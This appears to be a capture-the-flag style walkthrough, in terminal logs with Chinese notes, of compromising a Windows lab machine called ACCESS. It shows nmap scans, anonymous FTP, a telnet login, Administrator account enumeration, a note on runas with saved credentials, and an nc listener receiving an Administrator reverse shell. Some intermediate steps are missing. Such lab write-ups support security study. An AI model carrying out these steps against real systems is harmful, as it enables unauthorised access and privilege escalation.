┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.98 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:27 CST Nmap scan report for10.10.10.98 Host is up (0.48s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.17 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p21,23,80 -sC -sV --min-rate=100010.10.10.98 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:42 CST Nmap scan report for10.10.10.98 Host is up (1.5s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT 23/tcp open telnet Microsoft Windows XP telnetd | telnet-ntlm-info: | Target_Name: ACCESS | NetBIOS_Domain_Name: ACCESS | NetBIOS_Computer_Name: ACCESS | DNS_Domain_Name: ACCESS | DNS_Computer_Name: ACCESS |_ Product_Version: 6.1.7600 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results: |_clock-skew: -8h03m35s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 56.38 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.98 -sU Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:44 CST Nmap scan report for10.10.10.98 Host is up (0.63s latency). All 65535 scanned ports on 10.10.10.98 are in ignored states. Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.60 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ ftp anonymous@10.10.10.98 Connected to 10.10.10.98. 220 Microsoft FTP Service 331 Anonymous access allowed, send identity(e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode(|||49158|) ftp: Can't connect to `10.10.10.98:49158': 连接超时 421 Service not available, remote server has closed connection. 229 Entering Extended Passive Mode(|||49158|) ftp> exit
┌──(kali㉿offsec)-[~/Desktop] └─$ telnet 10.10.10.98 Trying 10.10.10.98... Connected to 10.10.10.98. Escape character is '^]'. Welcome to Microsoft Telnet Service
login: security password:
*=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security>whoami access\security
C:\Users\security>dir- Volume in drive C has no label. Volume Serial Number is 8164-DB5F
C:\Users\security> net user administratorer User name Administrator Full Name Comment Built-in account for administering the computer/domain User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set8/21/201810:01:12 PM Password expires Never Password changeable 8/21/201810:01:12 PM Password required No User may change password No
Workstations allowed All Logon script User profile Home directory Last logon 5/21/20248:40:32 AM
Logon hours allowed All
Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully.
C:\Users\security>
17、runas 命令: runas 是 Windows 系统上自带的一个命令,通过此命令可以以指定权限级别间接启动我们的程序,而不止是继承父进程的权限。用到的其实是凭证。
┌──(kali㉿offsec)-[~/Desktop] └─$ rlwrap nc -lnvp 53 listening on [any] 53 ... connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49163 Windows PowerShell running as user Administrator on ACCESS Copyright(C) 2015 Microsoft Corporation. All rights reserved.